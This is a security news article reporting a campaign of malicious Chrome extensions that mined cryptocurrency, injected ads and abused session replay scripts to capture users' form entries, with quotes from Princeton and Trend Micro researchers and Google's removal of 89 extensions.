If Cryptojacking Wasn’t Enough, Attackers Are Now Using “Session Replay” Scripts to Record Every Movement You Make
In November last year, researchers revealed how analytics firms were invasively tracking website visitors using scripts that record pages you visit and the searches you make. The research had focused on exfiltration of personal data by so-called session replay scripts. "More and more sites use “session replay” scripts," Princeton researchers warned.
These scripts record your keystrokes, mouse movements, and scrolling behavior, along with the entire contents of the pages you visit, and send them to third-party servers.
It appears developers of malicious extensions are now incorporating this mechanism into their latest offerings. "Unlike typical analytics services that provide aggregate statistics, these scripts are intended for the recording and playback of individual browsing sessions, as if someone is looking over your shoulder," researchers had said. Who wouldn't want to watch over your shoulder while you browse - criminals, hackers, advertisers - basically, everyone is out for more data.
Malicious Chrome extensions deliver cryptocurrency mining code, inject ads, and violate user privacy through session replay scripts
These extensions hijacked browsers to mine for Monero, displayed unwanted ads and also included these session replay scripts that are usually used by analytics firms. While in the cases of Princeton research, the data was observed by analytics firms, in this case it's the criminals who get to record and replay your "keystrokes, mouse movements, and scrolling behavior, along with the entire contents of the pages you visit".
"These libraries are meant to be used to replay a user's visit to a website, so that the site owner can see what the user saw, and what he entered into the machine, among other things," Trend Micro researchers wrote. "Other researchers have raised the possibility that these libraries could be abused, but this is the first time we have seen this in the wild."
This library enables attackers to steal data entered into forms, including usernames, credit card numbers, CVV numbers, email addresses, and phone numbers. Researchers noted that the legitimate library doesn't steal passwords, which means attackers don't have that ability too. "Droidclub can also modify the contents of viewed websites," they added.
As for installation, the attacker behind this campaign uses malvertising and social engineering techniques to get the user to install these malicious Chrome extensions.
Google has removed 89 such extensions from the Chrome Web Store that were installed by over 423,992 users. Along with removal of these extensions from the Store, Google said it has also disabled them on all the devices where they were installed.